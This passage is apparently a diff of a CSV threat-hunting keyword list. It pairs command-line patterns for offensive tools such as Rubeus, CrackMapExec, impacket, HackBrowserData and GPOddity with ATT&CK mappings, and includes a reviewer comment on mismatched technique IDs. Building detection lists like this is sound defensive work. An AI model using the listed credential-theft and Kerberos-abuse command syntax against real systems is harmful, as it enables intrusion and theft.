","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -GHUser * -GHRepo *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* github repos list --org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "* github repos list --user *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" 
@@ -733,27 +733,27 @@ "* give-genericall * -target-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* gkrellm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"* --gmsa-decrypt-lsa *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --gmsa-decrypt-lsa *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* go build -o padre .*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" -"* golden * /badpwdcount*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* golden * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* golden * /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /badpwdcount*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gophish-*.zip*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"* 'GPODDITY$' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* --gpo-id * --domain * --command *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* --gpo-id * --gpo-type * --no-smb-server *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"* 'GPODDITY$' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --gpo-id * --domain * --command *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --gpo-id * --gpo-type * --no-smb-server *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "* --GPOName * --FilterEnabled --TargetDnsName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" -"* gpp_autologin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* gpp_password*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* gpp_autologin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* gpp_password*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"* --greeting * --personalize *--securelink*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"* -grouper2 -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -H * -u * -p * -r *C$/Users*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"* --greeting * --personalize *--securelink*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"* -grouper2 -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -H * -u * -p * -r *C$/Users*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "* -h *-p * -c cypher.bin -k key.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"* hack.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* HackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"* hack.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* HackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation 
tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" "* HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "* hackergu *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - 
TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-datanode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
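Review bot: The three GPOddity rows in this hunk (`* 'GPODDITY$' *`, `* --gpo-id * --domain * --command *`, `* --gpo-id * --gpo-type * --no-smb-server *`) are re-emitted with `T1558.001 - T1076 - T1552.001` in `metadata_tool_techniques`, which does not match their own description, "GPO attack vectors through NTLM relaying". `T1076` is a deprecated ATT&CK ID (superseded by `T1021.001`, Remote Desktop Protocol) and `T1558.001` is Golden Ticket, so alerts built from these rows would be triaged under the wrong techniques. Something like `"T1557.001 - T1484.001 - T1552.001"` (relay plus Group Policy modification) looks closer, though the maintainers should confirm the intended mapping. Separately, the `"* HackBrowserData"` row has no trailing `*`, unlike the `"* HackBrowserData*"` row below it, so depending on how the consumer anchors patterns it may match only at the end of a command line. It is worth confirming that this is intended.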
@@ -762,30 +762,30 @@ "* hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* harvest * /monitorinterval:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* harvest * /monitorinterval:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* -hasbootstraphint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"* -hashes * -spn * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -hashes lm:nt -gpo-id * -powershell *","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","2","178","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" +"* -hashes * -spn * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network 